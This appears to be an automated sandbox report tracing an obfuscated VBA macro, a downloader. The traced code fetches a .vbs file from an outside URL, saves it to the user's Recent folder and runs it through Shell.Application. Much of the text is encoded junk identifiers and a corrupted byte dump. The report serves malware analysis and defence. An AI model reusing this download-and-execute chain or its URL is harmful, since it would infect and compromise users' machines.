                                              Dim \xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba

                                              26

                                              \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 = 1

                                              31

                                              Set \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3 = CreateObject("microsoft.xmlhttp")

                                              CreateObject("microsoft.xmlhttp")

                                              executed
                                              32

                                              Set \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4 = CreateObject("Shell.Application")

                                              CreateObject("Shell.Application")

                                              executed
                                              34

                                              \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab = JUvyuihkbSpecialPathKBJKfgh + \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6("\V\xe4\xb6M\xe3\xdaV.vb\xd5")

                                              35

                                              \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.Open "get", \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xc2\xdbgdh\xc3\xdcjh\xdcd\xd5\xc3jh\xdc\xd5dgj\xc3/\xd5\xd6\xdch\xc0gdhg\xd6\xd6jw\xd6qw\xd4gw\xc2\xd4wg/vb\xd5\xc3jzbdkj\xd5bg\xc3z\xd5kld\xc3bg\xd5/\xc1\xc3h\xdbd\xc3hgj\xd5\xdbg\xc3h\xdbz.vb\xd5"), False

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False)

                                              executed
                                              36

                                              \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.send

                                              send

                                              37

                                              \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae = \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.responseBody

                                              responseBody

                                              38

                                              If \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.Status = 200 Then

                                              IXMLHTTPRequest.Status() -> 200

                                              executed
                                              39

                                              Set \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae = CreateObject("adodb.stream")

                                              CreateObject("adodb.stream")

                                              executed
                                              40

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Open

                                              Stream.Open()

                                              executed
                                              41

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Type = \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4

                                              Type

                                              42

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Write \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae

                                              Stream.Write(??????????\xfffd?????????????\xfffd??????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd????????????????????????\xfffd???????????????????????????\xfffd?????????????????????????????????????\xfffd?????????????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd????????????\xfffd??????\xfffd?????????????????\xfffd??????????????????????????????????????\xfffd????????????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd??????????????????????????????\xfffd????????????????????????\xfffd????????????????????????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd???????????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd????????????\xfffd????????????\xfffd?????????????????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd????????????????????????\xfffd????????????????????????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd???????????\xfffd????????????\xfffd?????\xfffd??????\xfffd???????????????????\xfffd????????????\xfffd?????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????\xfffd????????????????????????\xfffd?????\xfffd??????????????????\xfffd??????????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd???????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd??????\xfffd??????????????????\xfffd??????\xfffd???????????????????????????????????????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd?????????????????????????\xfffd????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd????????????????????????????????????????????????????????????????????????????????\xfffd?????\xfffd????????????\xfffd?????\xfffd????????????????????????????????????????????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd???????????\xfffd?????\xfffd?????????????\xfffd?????\xfffd???????????????????\xfffd????????????\xfffd??????????????????????????????????????\xfffd???????????\xfffd?????????????????????????????????????\xfffd????????????\xfffd?????????????\xfffd?????????????????\xfffd?????\xfffd???????????\xfffd?????\xfffd????????????\xfffd?????\xfffd?????????????\xfffd???????????\xfffd?????????????\xfffd???????????\xfffd?????????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd?????\xfffd????????????\xfffd???????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????\xfffd?????\xfffd???????????\xfffd????????????????????????????????????????????\xfffd???????????\xfffd?????\xfffd?????????????\xfffd?????\xfffd?????\xfffd?????????????????????????????????????????????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????????????????????????\xfffd????????????\xfffd?????????????????????????\xfffd????????????????????????\xfffd?????????????????????????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????\xfffd????????????\xfffd????????????\xfffd???????????????????\xfffd?????\xfffd????????????\xfffd????????????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????????????????????????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd???????????\xfffd???????????????????????????????????????\xfffd??????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd?????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd??????????????????\xfffd???????????\xfffd??????\xfffd?????\xfffd?????\xfffd????????????\xfffd???????????\xfffd????????????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd???????????????????\xfffd??????????????????????????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd???????????????????????????????\xfffd??????\xfffd?????????????????????????\xfffd????????????????????????\xfffd?????\xfffd???????????????????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd????????????????????????????????\xfffd??????????????????\xfffd?????\xfffd??????\xfffd????????????????????????????????????????????????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd?????\xfffd??????????????????\xfffd????????????\xfffd????????????\xfffd?????\xfffd????????????\xfffd????????????????????????????????\xfffd??????\xfffd??????\xfffd??????????????????????????????\xfffd??????\xfffd??????????????????????????????\xfffd??????????????????\xfffd???????????????????????\xfffd??????\xfffd????????????????????????\xfffd?????????????????\xfffd???????????\xfffd??????\xfffd?????????????\xfffd??????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd?????\xfffd???????????????????????\xfffd?????????????\xfffd???????????????????????\xfffd?????????????????????????\xfffd?????????????????\xfffd?????\xfffd??????)

                                              executed
                                              43

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.SaveToFile \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab, \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 + \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4

                                              SaveToFile

                                              44

                                              \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae.Close

                                              Close

                                              45

                                              Endif

                                              46

                                              \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4.Open (\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab)

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs")

                                              executed
                                              47

                                              End Sub

                                              Non-Executed Functions

                                              Function

                                              \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6APIs: 5, Strings: 2, Number of lines: 14, Relevance: 22.014

                                              APIsMeta Information

                                              Len

                                              		Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12 Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffd\xfffdgdh\xfffd\xfffdjh\xfffdd\xfffd\xfffdjh\xfffd\xfffddgj\xfffd/\xfffd\xfffd\xfffdh\xfffdgdhg\xfffd\xfffdjw\xfffdqw\xfffdgw\xfffd\xfffdwg/vb\xfffd\xfffdjzbdkj\xfffdbg\xfffdz\xfffdkld\xfffdbg\xfffd/\xfffd\xfffdh\xfffdd\xfffdhgj\xfffd\xfffdg\xfffdh\xfffdz.vb\xfffd") -> 116

                                              InStr

                                              		InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","V") -> 77 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 104 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 107 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","M") -> 68 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 103 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 109 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",".") -> 52 InStr(" 